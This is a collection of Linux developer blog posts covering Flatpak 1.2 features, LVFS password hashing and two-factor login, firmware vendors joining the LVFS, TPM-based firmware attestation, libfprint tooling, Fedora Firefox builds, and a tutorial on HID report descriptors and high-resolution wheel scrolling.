Flatpak now logs changes to installations and installed apps in the systemd journal. We take advantage of the capabilities offered by the journal, and write structured logs that contain useful fields like the affected remote, the commit IDs, and so on.

A particularly nice feature of the journal is that it keeps track of the originator of changes for us, so even if Flatpak’s system-helper service is modifying the system installation, we still record the user who initiated the change.

You can of course use journalctl to study these logs. We also added a flatpak history command, which may be a bit more convenient, since it offers filtering and display that is more tailored to the specifics of Flatpak.

In the ecosystem

Portals are an important part of the Flatpak approach, and we’ve made releases of the portals to go along with the new Flatpak.  The 1.2 release of the portals brings a new location portal, a new portal for toolkit settings, respecting desktop lockdown settings, and better validation of input in all portals.

Flatpak itself also got some changes that will improve sandboxing in the future. One noteworthy change is that Flatpak will now bind dconf defaults and locks into the sandbox. This will become useful with the next GLib release, when GSettings will no longer be using the dconf backend, allowing us to close an all-too-common sandbox hole.

In a similar vein, Flatpak is now creating a fontconfig configuration snippet that will be used by a future fontconfig release to map font directories to their caches.

The common theme in these changes is that the libraries in the runtime need some changes to work well in a sandboxed setting. Getting these changes in place takes time, but we’re making steady progress.

Over the fence

On the desktop side, both GNOME Settings and GNOME Software will show Flatpak permissions in more detail in their upcoming releases.

Looking ahead

Now that Flatpak 1.2 is out, we are getting  ready to unveil a much-improved Flathub. Stay tuned!

Security Enhancements to the LVFS

Posted by Richard Hughes on January 23, 2019 03:41 PM

I’ve just deployed two security enhancements to the LVFS. It’s important to note that this is proactive, in response to suggestions from OEMs, and there has not been any security issue with the service.

  • All passwords will be upgraded to a modern PBKDF2, in our case using SHA256 (see the sketch after this list for what that looks like). By logging in to the LVFS your password is automatically upgraded and no manual action is required. Any user accounts that have not been used by this time next year will be sent an email to remind them.
  • Local users can now optionally secure their accounts using two-factor authentication, in our case using OTP. Users can opt in to 2FA in the usual “Profile” menu once logged in to the LVFS. In the profile section you can also test your OTP PIN before enabling it for your account. Two-factor authentication is considered a very good way of securing your user account and is a very good idea for administrator, manager and QA user access levels. Although 2FA isn’t required for all account types at the moment, in the future we might tighten the security policy a little bit when we know it’s all working for everybody.
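
For the curious, PBKDF2 with SHA256 is nothing exotic; a minimal sketch of the general idea in Python follows, where the salt handling and iteration count are purely illustrative and not the exact parameters the LVFS uses:

#!/usr/bin/python3
# Illustrative only: hash a password with PBKDF2-HMAC-SHA256.
# The salt, iteration count and encoding are examples, not the
# parameters actually used by the LVFS.
import hashlib
import os

password = b"correct horse battery staple"
salt = os.urandom(16)
digest = hashlib.pbkdf2_hmac("sha256", password, salt, 100000)
print(salt.hex(), digest.hex())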

As a consequence of these changes, the login dialog for the LVFS now looks a little different. All the same buttons are there (forgot password etc.) but the login process is now a two-step process rather than a single step. For vendors using OAuth, nothing much changes, and if required 2FA should be enabled by your domain administrator rather than enabled on the LVFS. If anyone has any problems, please let me know.

Please welcome Star Labs to the LVFS

Posted by Richard Hughes on January 22, 2019 02:11 PM

A few weeks ago Sean from Star Labs asked me to start the process of joining the LVFS. Star Labs is a smaller Linux-friendly OEM based just outside London, not far from where I grew up. We identified three types of firmware we could update: the system firmware, the EC firmware and the SSD firmware. The first should soon be possible with the recent pledge of capsule support from AMI, and we’ve got a binary for testing now. The EC firmware will need further work, although now I can get the IT8987 into (and out of) programming mode. The SSD firmware needed a fix to fwupd (to work around a controller quirk), but with the soon-to-be-released fwupd it can already be updated.

Sean also shipped me some loaner hardware that could be recovered using manufacturing tools if I broke it, which makes testing the ITE EC flashing possible. The IT89 chip is subtly different to the IT87 chip in other hardware like the Clevo reference designs, but this actually makes it easier to support as there are fewer legacy modes. This will be a blog post all of its own.

In playing with the hardware intermittently for a few weeks, I’ve got a pretty good feel for the “LabTop” and “Star Lite” models. There is a lot to like: the aluminium cases feel both solid and tactile (like an XPS 13) and it feels really “premium”, unlike the Clevo reference hardware. Star Labs doesn’t use the Clevo platform any more, which allows it to take some other bolder system design choices. Some things I love: the LED IPS screen, USB-C charging, the trackpad and keyboard. The custom keyboard design is actually a delight to use; I actually prefer it to my Lenovo P50 and XPS 13 for key placement and key travel. The touchpad seems responsive, and the virtual buttons work well, unlike some of the other touchpads from other Linux-friendly OEMs. The battery life seems superb, although I’ve not really done enough discharge→charge→discharge cycles to be able to measure it properly. The front-facing camera is at the top of the bezel where it belongs, which is something the XPS 13 has only just fixed in the latest models. Nobody needs to see up my nose.

There are a few things that could be improved with the hardware in my humble opinion: the shiny bezel around the touchpad is somewhat distracting on an otherwise beautifully matte chassis. There is also only a microSD slot, when all my camera cards are full sized. The RAM is soldered in, and so can’t be upgraded in the future, and the case screws are not “captive” like the new Lenovos. It also doesn’t seem to have a Thunderbolt interface, which might matter if you want to use this thing docked with a bazillion things plugged in. Some of these are probably cost choices; the LabTop is significantly cheaper than the XPS 13 developer edition I keep comparing it against in my head.

I was also curious to try the vendor-supplied customized Ubuntu install which was supplied with it. It just worked, in every way, and for those installing other operating systems like Fedora or Arch all the different distros have been pre-tested with extra notes – a really nice touch. This is where Star Labs really shine; these guys really care about Linux and it shows. I’ve been impressed with the LabTop and I’ll be sad to return it when all the hardware is supported by fwupd and firmware releases are available on the LVFS.

So, if you’re using StarDrive hardware already then upgrade fwupd to the latest development version, enable the LVFS testing remote using fwupdmgr enable-remote lvfs-testing and tell us how the process goes. For technical reasons you need to power down the machine and power it back up rather than just doing a “warm” reboot. In a few weeks we’ll do a proper fwupd release and push the firmware to stable.

Phoenix joins the LVFS

Posted by Richard Hughes on January 09, 2019 02:15 PM

Just like AMI, Phoenix is a huge firmware vendor, providing the firmware for millions of machines. If you’re using a ThinkPad right now, you’re most probably using Phoenix code in your mainboard firmware. Phoenix have been working with Lenovo and their ODMs on LVFS support for a while, fixing all the niggles that were stopping the capsule from working with the loader used by Linux. Phoenix can help customers build deliverables for the LVFS that use UX capsule support to make flashing beautiful, although it’s up to the OEM if that’s used or not.

It might seem slightly odd for me to be working with the firmware suppliers, rather than just OEMs, but I’m actually just doing both in parallel. From my point of view, both of the biggest firmware suppliers now understand the LVFS, and provide standards-compliant capsules by default. This should hopefully mean smaller Linux-specific OEMs like Tuxedo and Star Labs might be able to get signed UEFI capsules, rather than just getting a ROM file and an unsigned loader.

We’re still waiting for the last remaining huge OEM, but fingers crossed that should be any day now.

Fedora Firefox heads to updates with PGO/LTO.

Posted by Martin Stransky on January 08, 2019 10:29 AM

I’ve had lots of fun with GCC performance tuning in Fedora, but without much result. When Mozilla switched its official builds to clang I considered that too, due to difficulties with the GCC PGO/LTO setup and the inferior speed of Fedora Firefox builds compared to Mozilla’s official builds.

That movement woke up GCC fans to parry the threat. Lots of arguments were brought to that ticket about clang insecurity and missing features. More importantly, upstream developer Honza Hubicka found and fixed a profile data generation bug (besides others) and Jakub Jelinek worked out a GCC bug which caused Firefox to crash at startup.

That effort helped me to convince GCC to behave and thanks to those two guys Fedora can offer GCC Firefox builds with PGO (Profile-Guided Optimization) and LTO (Link-Time Optimization).

The new builds are waiting for you at Koji (Fedora 28, Fedora 29). Don’t hesitate to take them for a test drive; I use Speedometer as a general browser responsiveness benchmark. You can also compare them with official Mozilla builds, which are built with clang PGO/LTO.

Flatpak commandline design

Posted by Matthias Clasen on December 19, 2018 03:03 PM

Flatpak is made to run desktop apps, and there are apps like KDE Discover or GNOME Software that let you manage the Flatpak installations on your system.

Of course, we still need a way to handle Flatpak from the commandline. The flatpak commandline tool in 1.0 is powerful without being overwhelming (like git) and way friendlier than some other tools (for example, ostree).

But we can always do better. For Flatpak 1.2, we’ve gone back to the drawing board and done some design work for the commandline user experience (yes, that needs design too).

Powerful: Columns

Many Flatpak commands produce information in tabular form. You can list remotes, apps, documents, etc. And all these have a bunch of information that can be displayed. It can be overwhelming when you only need a particular piece of information (and it can overflow the available space in a terminal).

To help with that, we’ve introduced a --columns option with which you select which information you want to see.

You can explore the available columns using --columns=help. In Flatpak 1.2, all the list-producing commands will support the --columns option: list, search, remotes, remote-ls, ps, history.

One nice side-effect of having --columns is that we can add more information to the output of these commands without overflowing the display, by adding optional columns that are not included in the default output.

Concise: Errors

It happens all the time: I want to type search, but my c key is sticky, and it comes out as searh. Flatpak used to react to an unknown command by dumping out its --help output, which is long and a bit overwhelming.

Now we try to be more concise and more helpful at the same time, by making a guess at what was meant, and just pointing out the --help option.

Friendly: Search

In the same vein, the reverse-DNS style application ID that Flatpak relies on has been criticized as unwieldy and hard to handle. Nobody wants to type

flatpak install flathub org.gnome.meld

and commandline completion does not help too much if you have no idea what the application ID might be.

Thankfully, that is no longer necessary. With Flatpak 1.2, you can type

flatpak install meld

and Flatpak will ask you a few questions to confirm which remote to use and what exact application you meant. Much friendlier. This search also works for the uninstall command, and may be added to more commands in the future.

Informative: Descriptions

Flatpak repos contain appstream data describing the apps in detail. That is what e.g. GNOME Software uses on its detail page for an application.

So far, the Flatpak commandline has not used appstream data at all. But that is changing. In 1.2, a number of commands will show useful information from appstream data, such as the description shown by the list and info commands.

If you pay close attention you may notice that column names can be abbreviated with --columns.

Fun: Prompts

Here’s the commandline version of theming: we now set a custom prompt to let you know what context you are in when using a shell in a flatpak sandbox.

You can customize the prompt using

flatpak override --env=PS1="..."

The application ID for the sandbox is available in the FLATPAK_ID environment variable.

The beast: Progress

Updates and installs can take a long time – there are possibly big downloads and there may be dependencies that need to be updated as well, etc. For a good user experience it is  important to provide some feedback on the progress and the expected remaining time.

The Ostree library which Flatpak uses for downloads provides progress information, but it is very detailed and hard to digest.  To make this even more challenging, there is not that much space in a terminal window to display all the relevant information.

For 1.2, we’ve come up with  a combination of a table that gets updated to display overall status and a progress line for the current operation:

[Video: https://blogs.gnome.org/mclasen/files/2018/12/install.webm]

A similar, but simpler layout is used for uninstalls.

[Video: https://blogs.gnome.org/mclasen/files/2018/12/uninstall.webm]

Coming Soon

All of these improvements will appear in Flatpak 1.2, hopefully very soon after the New Year. Something to look forward to.  📦📦📦

Understanding HID report descriptors

Posted by Peter Hutterer on December 15, 2018 04:47 AM

This time we're digging into HID - Human Interface Devices and more specifically the protocol your mouse, touchpad, joystick, keyboard, etc. use to talk to your computer.

Remember the good old days where you had to install a custom driver for every input device? Remember when PS/2 (the protocol) had to be extended to accommodate mouse wheels, and then again for five-button mice? And you had to select the right protocol to make it work. Yeah, me neither, I tend to suppress those memories because the world is awful enough as it is.

As users we generally like devices to work out of the box. Hardware manufacturers generally like to add bits and bobs because otherwise who would buy that new device when last year's device looks identical. This difference in needs can only be solved by one superhero: Committee-man, with the superpower to survive endless meetings and get RFCs approved.

Many many moons ago, when USB itself was in its infancy, Committee man and his sidekick Caffeine boy got the USB consortium to agree on a standard for input devices that is so self-descriptive that operating systems (Win95!) can write one driver that can handle this year's device, and next year's, and so on. No need to install extra drivers, your device will just work out of the box. And so HID was born. This may only be an approximate summary of history.

Originally HID was designed to work over USB. But just like Shrek the technology world is obsessed with layers, so these days HID works over different transport layers. HID over USB is what your mouse uses, HID over i2c may be what your touchpad uses. HID works over Bluetooth and its celebrity-diet version BLE. Somewhere, someone out there is very slowly moving a mouse pointer by sending HID over carrier pigeons just to prove a point. Because there's always that one guy.

HID is incredibly simple in that the static description of the device can just be bytes burnt into the ROM like the Australian sun into unprepared English backpackers. And the event frames are often an identical series of bytes where every bit is filled in by the firmware according to the axis/buttons/etc.

HID is incredibly complicated because parsing it is a stack-based mental overload. Each individual protocol item is simple but getting it right and all into your head is tricky. Luckily, I'm here for you to make this simpler to understand or, failing that, at least more entertaining.

As said above, the purpose of HID is to make devices describe themselves in a generic manner so that you can have a single driver handle any input device. The idea is that the host parses that standard protocol and knows exactly how the device will behave. This has worked out great, we only have around 200 files dealing with vendor- and hardware-specific HID quirks as of v4.20.

HID messages are Reports. And to know what a Report means and how to interpret it, you need a Report Descriptor. That Report Descriptor is static and contains a series of bytes detailing "what" and "where", i.e. what a sequence of bits represents and where to find those bits in the Report. So let's try and parse one of these Report Descriptors, let's say for a fictional mouse with a few buttons. How exciting, we're at the forefront of innovation here.

The Report Descriptor consists of a bunch of Items. A parser reads the next Item, processes the information within and moves on. Items are small (1 byte header, 0-4 bytes payload) and generally only apply exactly one tiny little bit of information. You need to accumulate several items to build up enough information to actually know what's happening.

The "what" question of the Report Descriptor is answered with the so-called Usage. This could be something simple like X or Y (0x30 and 0x31) or something more esoteric like System Menu Exit (0x88). A Usage is 16 bits but all Usages are grouped into so-called Usage Pages. A Usage Page too is a 16 bit value and together they form the 32-bit value that tells us what the device can do. Examples:


0001 0031 # Generic Desktop, Y
0001 0088 # Generic Desktop, System Menu Exit
0003 0005 # VR Controls, Head Tracker
0003 0006 # VR Controls, Head Mounted Display
0007 0031 # Keyboard, Keyboard \ and |

Note how the Usage in the last item is the same as the first one; without the Usage Page you will mix things up. It helps if you always think of the Usage as a 32-bit number. For your kids' bed-time story time, here are the HID Usage Tables from 2004 and the approved HID Usage Table Review Requests of the last decade. Because nothing puts them to sleep quicker than droning on about hex numbers associated with remote control buttons.
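
In code, "think of the Usage as a 32-bit number" just means shifting the Usage Page into the upper 16 bits; a tiny sketch:

# Compose the 32-bit "what" value from a Usage Page and a Usage
def usage32(usage_page, usage):
    return (usage_page << 16) | usage

print(hex(usage32(0x0001, 0x0031)))  # 0x10031, Generic Desktop / Y
print(hex(usage32(0x0007, 0x0031)))  # 0x70031, Keyboard / Keyboard \ and |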

To successfully interpret a Report from the device, you need to know which bits have which Usage associated with them. So let's go back to our innovative mouse. We would want a report descriptor with 6 items like this:


Usage Page (Generic Desktop)
Usage (X)
Report Size (16)
Usage Page (Generic Desktop)
Usage (Y)
Report Size (16)
This basically tells the host: X and Y both have 16 bits. So if we get a 4-byte Report from the device, we know two bytes are for X, two for Y.

HID was invented at a time when bits were more expensive than printer ink, so we can't afford to waste any bits (still the case, because who would want to spend an extra penny on more ROM). HID makes use of so-called Global items; once those are set, their value applies to all following items until changed. Usage Page and Report Size are such Global items, so the above report descriptor is really implemented like this:


Usage Page (Generic Desktop)
Usage (X)
Usage (Y)
Report Count (2)
Report Size (16)
Input (Data,Var,Rel)

The Report Count just tells us that 2 fields of the current Report Size are coming up. We have two usages, two fields, and 16 bits each so we know what to do. The Input item is sort-of the marker for the end of the stack; it basically tells us "process what you've seen so far", together with a few flags. Rel in this case means that the Usages are relative. Oh, and Input means that this is data from device to host. Output would be data from host to device, e.g. to set LEDs on a keyboard. There's also Feature which indicates configurable items.

Buttons on a device are generally just numbered so it'd be a monumental 16-bits-at-a-time waste to have HID send Usage (Button1), Usage (Button2), etc. for every button on the device. HID instead provides a Usage Minimum and Usage Maximum to sequentially order them. This looks like this:


Usage Page (Button)
Usage Minimum (1)
Usage Maximum (5)
Report Count (5)
Report Size (1)
Input (Data,Var,Abs)
So we have 5 buttons here and each button has one bit. Note how the buttons are Abs because a button state is not a relative value, it's either down or up. HID is quite intolerant to Schrödinger's thought experiments.

Let's put the two things together and we have an almost-correct Report descriptor:


Usage Page (Button)
Usage Minimum (1)
Usage Maximum (5)
Report Count (5)
Report Size (1)
Input (Data,Var,Abs)

Report Size (3)
Report Count (1)
Input (Cnst,Arr,Abs)

Usage Page (Generic Desktop)
Usage (X)
Usage (Y)
Report Count (2)
Report Size (16)
Input (Data,Var,Rel)
New here is Cnst. This signals that the bits have a constant value, thus don't need a Usage and basically don't matter (haha. yeah, right. in theory). Linux does indeed ignore those. Cnst is used for padding to align on byte boundaries - 5 bits for buttons plus 3 bits padding make 8 bits. Which makes one byte as everyone agrees except for granddad over there in the corner. I don't know how he got in.

Were we to get a 5-byte Report from the device, we'd parse it approximately like this:


button_state = bytes[0] & 0x1f
x = bytes[1] | (bytes[2] << 8)
y = bytes[3] | (bytes[4] << 8)
Hooray, we're almost ready. Except not. We may need more info to correctly interpret the data within those reports.

The Logical Minimum and Logical Maximum specify the value range of the actual data. We need this to tell us whether the data is signed and what the allowable range is. Together with the Physical Minimum and the Physical Maximum they specify what the values really mean. In the simple case:


Usage Page (Generic Desktop)
Usage (X)
Usage (Y)
Report Count (2)
Report Size (16)
Logical Minimum (-32767)
Logical Maximum (32767)
Input (Data,Var,Rel)
This just means our x/y data is signed. Easy. But consider this combination:

...
Logical Minimum (0)
Logical Maximum (1)
Physical Minimum (1)
Physical Maximum (12)
This means that if the bit is 0, the effective value is 1. If the bit is 1, the effective value is 12.
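
The usual way to apply this is a linear mapping from the logical range onto the physical range; a small sketch of that idea (my own illustration, not code from any real HID parser):

# Map a raw value from the logical range onto the physical range
def to_physical(value, log_min, log_max, phys_min, phys_max):
    return phys_min + (value - log_min) * (phys_max - phys_min) / (log_max - log_min)

print(to_physical(0, 0, 1, 1, 12))  # 1.0
print(to_physical(1, 0, 1, 1, 12))  # 12.0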

Note that the above is one report only. Devices may have multiple Reports, indicated by the Report ID. So our Report Descriptor may look like this:


Report ID (01)
Usage Page (Button)
Usage Minimum (1)
Usage Maximum (5)
Report Count (5)
Report Size (1)
Input (Data,Var,Abs)
Report Size (3)
Report Count (1)
Input (Cnst,Arr,Abs)

Report ID (02)
Usage Page (Generic Desktop)
Usage (X)
Usage (Y)
Report Count (2)
Report Size (16)
Input (Data,Var,Rel)
If we were to get a Report now, we need to check byte 0 for the Report ID so we know what this is, i.e. our single-use hard-coded parser would look like this:

if bytes[0] == 0x01:
    button_state = bytes[1] & 0x1f
elif bytes[0] == 0x02:
    x = bytes[2] | (bytes[3] << 8)
    y = bytes[4] | (bytes[5] << 8)
A device may use multiple Reports if the hardware doesn't gather all data within the same hardware bits. Now, you may ask: if I get fifteen reports, how should I know what belongs together? Good question, and lucky for you the HID designers are miles ahead of you. Report IDs are grouped into Collections.

Collections can have multiple types. An Application Collection describes a set of inputs that make sense as a whole. Usually, every Report Descriptor must define at least one Application Collection but you may have two or more. For example, a keyboard with an integrated trackpoint should and/or would use two. This is how the kernel knows it needs to create two separate event nodes for the device. Application Collections have a few reserved Usages that indicate to the host what type of device this is. These are e.g. Mouse, Joystick, Consumer Control. If you ever wondered why you have a device named like "Logitech G500s Laser Gaming Mouse Consumer Control" this is the kernel simply appending the Application Collection's Usage to the device name.

A Physical Collection indicates that the data is collected at one physical point, though what a point is is a bit blurry. Theoretical physicists will disagree but a point can be "a mouse". So it's quite common for all reports on a mouse to be wrapped in one Physical Collection. If you have a device with two sets of sensors, you'd have two collections to illustrate which ones go together. Physical Collections also have reserved Usages like Pointer or Head Tracker.

Finally, a Logical Collection just indicates that some bits of data belong together, whatever that means. The HID spec uses the example of buffer length field and buffer data but it's also common for all inputs from a mouse to be grouped together. A quick check of my mice here shows that Logitech doesn't wrap the data into a Logical Collection but Microsoft's firmware does. Because where would we be if we all did the same thing...

Anyway. Now that we know about collections, let's look at a whole report descriptor as seen in the wild:


Usage Page (Generic Desktop)
Usage (Mouse)
Collection (Application)
Usage Page (Generic Desktop)
Usage (Mouse)
Collection (Logical)
Report ID (26)
Usage (Pointer)
Collection (Physical)
Usage Page (Button)
Usage Minimum (1)
Usage Maximum (5)
Report Count (5)
Report Size (1)
Logical Minimum (0)
Logical Maximum (1)
Input (Data,Var,Abs)
Report Size (3)
Report Count (1)
Input (Cnst,Arr,Abs)
Usage Page (Generic Desktop)
Usage (X)
Usage (Y)
Report Count (2)
Report Size (16)
Logical Minimum (-32767)
Logical Maximum (32767)
Input (Data,Var,Rel)
Usage (Wheel)
Physical Minimum (0)
Physical Maximum (0)
Report Count (1)
Report Size (16)
Logical Minimum (-32767)
Logical Maximum (32767)
Input (Data,Var,Rel)
End Collection
End Collection
End Collection
We have one Application Collection (Generic Desktop, Mouse) that contains one Logical Collection (Generic Desktop, Mouse). That contains one Physical Collection (Generic Desktop, Pointer). Our actual Report (and we have only one but it has the decimal ID 26) has 5 buttons, two 16-bit axes (x and y) and finally another 16 bit axis for the Wheel. This device will thus send 8-byte reports and our parser will do:

if bytes[0] != 0x1a: # it's decimal in the above descriptor
    error, should be 26
button_state = bytes[1] & 0x1f
x = bytes[2] | (bytes[3] << 8)
y = bytes[4] | (bytes[5] << 8)
wheel = bytes[6] | (bytes[7] << 8)
That's it. Now, obviously, you can't write a parser for every HID descriptor out there so your actual parsing code needs to be generic. The Linux kernel does exactly that and so does everything else that needs to parse HID. There's a huge variety in devices out there, all with HID descriptors that may or may not be correct. As with so much in life, correct HID implementations are often defined by "whatever Windows accepts" so if you like playing catch-up, Linux development is for you.

Oh, in case you just got a bit too optimistic about the state of the world: HID allows for vendor-defined usages. Which does exactly what you'd think it does, it hides vendor-specific protocol inside what should be a generic protocol. There are devices with hidden report IDs that you can only unlock by sending the right magic sequence to the report and/or by defeating the boss on Level 4. Usually those devices present themselves as basic/normal devices over HID but if you know the magic sequence you get to use *gasp* all buttons. Or access the device-specific configuration features. Logitech's HID++ is just one example here but at least that's one where we have most of the specs available.

The above describes how to parse the HID report descriptor and interpret the reports. But what happens once you have a HID report correctly parsed? In the case of the Linux kernel, once the report descriptor is parsed evdev nodes are created (one per Application Collection, more or less). As the Reports come in, they are mapped to evdev codes and the data appears on the evdev node. That's where userspace like libinput can pick it up. That bit is actually quite simple (mostly anyway).

The above output was generated with the tools from the hid-tools repository. Go forth and hid-record.

Firmware Attestation

Posted by Richard Hughes on December 14, 2018 08:23 PM

When fwupd writes firmware to devices, it often writes it, then does a verify pass. This is to read back the firmware to check that it was written correctly. For some devices we can do one better, and read the firmware hash and compare it against a previously cached value, or match it against the version published by the LVFS. This means we can detect some unintentional corruption or malicious firmware running on devices, on the assumption that the bad firmware isn’t just faking the requested checksum. Still, better than nothing.
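
As a sketch of the idea, and nothing more, the comparison itself is trivial; the filename and expected digest below are made up for illustration:

#!/usr/bin/python3
# Sketch only: compare a local firmware image against a published
# SHA-256 value. The filename and expected digest are placeholders.
import hashlib

expected = "0123456789abcdef"  # truncated placeholder, not a real digest
with open("firmware.bin", "rb") as f:
    digest = hashlib.sha256(f.read()).hexdigest()
print("OK" if digest == expected else "MISMATCH")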

Any processor better than the most basic PIC or Arduino (e.g. even a tiny $5 ARM core) is capable of doing public/private key firmware signing. This would use standard crypto using X.509 keys or GPG to ensure the device only runs signed firmware. This protects against both accidental bitflips and naughty behaviour, and is the unofficial industry-recommended practice for firmware updates. Older generations of the Logitech Unifying hardware were unsigned, and this made the MouseJack hack almost trivial to deploy on an unmodified dongle. Newer Unifying hardware requires a firmware image signed by Logitech, which makes deploying unofficial or modified firmware almost impossible.

There is a snag with UEFI capsule updates, which is how you probably applied your last “BIOS” firmware update. Although the firmware capsule is signed by the OEM or ODM, we can’t reliably read the SPI EEPROM from userspace. It’s fair to say flashrom does work on some older hardware but it also likes disabling keyboard controllers and making the machine reboot when probing hardware. We can get a hash of the firmware, or rather, a hash derived from the firmware image with other firmware-related things added for good measure. This is helpfully stored in the TPM chip, which most modern laptops have installed.

Although the SecureBoot process cares about the higher PCR values to check all manner of userspace, we only care about index zero of this register, the so-called PCR0. If you change your firmware, for any reason, the PCR0 will change. There is one PCR0 checksum (or a number slightly higher than one, for reasons) on all hardware of a given SKU. If you somehow turn the requirement for the hardware signing key off on your machine (e.g. a newly found security issue), or your firmware is flashed using another method than UpdateCapsule (e.g. DediProg) then you can basically flash anything. This would be unlikely, but really bad.

If we include the PCR0 in the vendor-supplied firmware.metainfo.xml file, or set it in the admin console of the LVFS then we can verify that the firmware we’re running right now is the firmware the ODM or OEM uploaded. This means you can have firmware 100% verified, where you’re sure that the firmware version that was uploaded by the vendor is running on your machine right now. This is good.

As an incentive for vendors to support signing there are now “green ticks” and “red crosses” icons for each firmware on the LVFS. All green ticks mean the firmware was uploaded to the LVFS by the OEM or authorized ODM on behalf of the OEM, the firmware is signed using strong encryption, and we can do secure attestation for verification.

Obviously some protocols can’t do everything properly (e.g. ColorHug, even symmetric crypto isn’t good) but that’s okay. It’s still more secure than flashing a random binary from an FTP site, which is what most people were doing before. Not upstream yet, and not quite finished, so comments welcome.

The tools of libfprint

Posted by Bastien Nocera on December 14, 2018 04:04 PM
libfprint, the fingerprint reader driver library, is nearing a 1.0 release.

Since the last time I reported on the status of the library, we've made some headway modernising the library, using a variety of different tools. Let's go through them and how they were used.

Callcatcher

When libfprint was in its infancy, Daniel Drake found that the NBIS fingerprint processing library matched what was required to provide fingerprint matching algorithms, and imported it into libfprint. Since then, the code in this copy-paste library in libfprint has stayed the same. When updating it to the latest available version (from 2015 rather than 2007), as well as splitting off a patch to make it easier to update the library again in the future, I used Callcatcher to cull the unused functions.

Callcatcher is not a "production-level" tool (too many false positives, lack of support for many common architectures, etc.), but coupled with manual checking, it allowed us to greatly reduce the number of functions in our copy, so they weren't reported when using other source code quality checking tools.

LLVM's scan-build

This is a particularly easy one to use as its use is integrated into meson, and available through ninja scan-build. The output of the tool, whether on stderr, or on the HTML pages, is pretty similar to Coverity's, but the tool is free, and easily integrated into a CI (once you've fixed all the bugs, obviously). We found plenty of possible memory leaks and uninitialised variables using this, with more flexibility than using Coverity's web interface, and avoiding going through hoops when using its "source code check as a service" model.

cflow and callgraph

LLVM has another tool, called callgraph. It's not yet integrated into meson, which made it a bit of a problem to get some output out of it. But combined with cflow, we used it to find where certain functions were called, trying to find the origin of some variables (whether they were internal or device-provided for example), which helped with implementing additional guards and assertions in some parts of the library, in particular inside the NBIS sub-directory.

0.99.0 is out

We're not yet completely done with the first pass at modernising libfprint and its ecosystem, but we released an early Yule present with version 0.99.0. It will be integrated into Fedora after the holidays if the early testing goes according to plan.

We also expect a great deal from our internal driver API reference. If you have a fingerprint reader that's unsupported, contact your laptop manufacturer about them providing a Linux driver for it and point them at this documentation.

A number of laptop vendors are already asking their OEM manufacturers to provide drivers to be merged upstream, but a little nudge probably won't hurt.

Happy holidays to you all, and see you for some more interesting features in the new year.

High resolution wheel scrolling on Linux v4.21

Posted by Peter Hutterer on December 12, 2018 04:27 AM

Disclaimer: this is pending for v4.21 and thus not yet in any kernel release.

Most wheel mice have a physical feature to stop the wheel from spinning freely. That feature is called detents, notches, wheel clicks, stops, or something like that. On your average mouse that is 24 wheel clicks per full rotation, resulting in the wheel rotating by 15 degrees before its motion is arrested. On some other mice that angle is 18 degrees, so you get 20 clicks per full rotation.

Of course, the world wouldn't be complete without fancy hardware features. Over the last 10 or so years devices have added free-wheeling scroll wheels or scroll wheels without distinct stops. In many cases wheel behaviour can be configured on the device, e.g. with Logitech's HID++ protocol. A few weeks back, Harry Cutts from the chromium team sent patches to enable Logitech high-resolution wheel scrolling in the kernel. Succinctly, these patches added another axis next to the existing REL_WHEEL named REL_WHEEL_HI_RES. Where available, the latter axis would provide finer-grained scroll information than the click-by-click REL_WHEEL. At the same time I accidentally stumbled across the documentation for the HID Resolution Multiplier Feature. A few patch revisions later and we now have everything queued up for v4.21. Below is a summary of the new behaviour.

The kernel will continue to provide REL_WHEEL as axis for "wheel clicks", just as before. This axis provides the logical wheel clicks; (almost) nothing changes here. In addition, a REL_WHEEL_HI_RES axis is available which allows for finer-grained resolution. On this axis, the magic value 120 represents one logical traditional wheel click but a device may send a fraction of 120 for a smaller motion. Userspace can either accumulate the values until it hits a full 120 for one wheel click or it can scroll by a few pixels on each event for a smoother experience. The same principle is applied to REL_HWHEEL and REL_HWHEEL_HI_RES for horizontal scroll wheels (which these days is just tilting the wheel). The REL_WHEEL axis is now emulated by the kernel and simply sent out whenever we have accumulated 120.
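
A userspace consumer that wants to keep click-based behaviour could do that accumulation itself; a rough sketch of the idea (not what libinput actually does):

# Sketch: accumulate REL_WHEEL_HI_RES deltas into whole wheel clicks.
# A value of 120 corresponds to one traditional wheel click.
accumulated = 0

def handle_hi_res(delta):
    global accumulated
    accumulated += delta
    clicks = 0
    while abs(accumulated) >= 120:
        clicks += 1 if accumulated > 0 else -1
        accumulated -= 120 if accumulated > 0 else -120
    return clicks  # number of whole clicks to act on for this event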

Important to note: REL_WHEEL and REL_HWHEEL are now legacy axes and should be ignored by code handling the respective high-resolution version.

The magic value of 120 is taken directly from Windows. That value was chosen because it has a good number of integer factors, so dividing 120 by whatever multiplier the mouse uses gives you an integer fraction of 120. And because HW manufacturers want it to work on Windows, we can rely on them doing it right, provided we use the same approach.

There are two implementations that matter. Harry's patches enable the high-resolution scrolling on Logitech mice which seem to mostly have a multiplier of 8 (i.e. REL_WHEEL_HI_RES will send eight events with a value of 15 before REL_WHEEL sends 1 click). There are some interesting side-effects with e.g. the MX Anywhere 2S. In high-resolution mode with a multiplier of 8, a single wheel movement does not always give us 8 events; the firmware does its own magic here. So we have some emulation code in place with the goal of making the REL_WHEEL event happen on the mid-point of a wheel click motion. The exact point can shift a bit when the device sends 7 events instead of 8, so we have a few extra bits in place to reset after timeouts and direction changes to make sure the wheel behaviour is as consistent as possible.

The second implementation is for the generic HID protocol. This was all added for Windows Vista, so we're only about a decade behind here. Microsoft got the Resolution Multiplier feature into the official HID documentation (possibly in the hope that other HW manufacturers implement it which afaict didn't happen). This feature effectively provides a fixed value multiplier that the device applies in hardware when enabled. It's basically the same as the Logitech one except it's set through a HID feature instead of a vendor-specific protocol. On the devices tested so far (all Microsoft mice because no-one else seems to implement this) the multipliers vary a bit, ranging from 4 to 12. And the exact behaviour varies too. One mouse behaves correctly (Microsoft Comfort Optical Mouse 3000) and sends more events than before. Other mice just send the multiplied value instead of the normal value, so nothing really changes. And at least one mouse (Microsoft Sculpt Ergonomic) sends the tilt-wheel values more frequently and with a higher value. So instead of one event with value 1 every X ms, we now get an event with value 3 every X/4 ms. The mice tested do not drop events like the Logitech mice do, so we don't need fancy emulation code here. Either way, we map this into the 120 range correctly now, so userspace gets to benefit.

As mentioned above, the Resolution Multiplier HID feature was introduced for Windows Vista which is... not the most recent release. I have a strong suspicion that Microsoft dumped this feature as well, the most recent set of mice I have access to don't provide the feature anymore (they have vendor-private protocols that we don't know about instead). So the takeaway for all this is: if you have a Logitech mouse, you'll get higher-resolution scrolling on v4.21. If you have a Microsoft mouse a few years old, you may get high-resolution wheel scrolling if the device supports it. Any other vendor or a new Microsoft mouse, you don't get it.

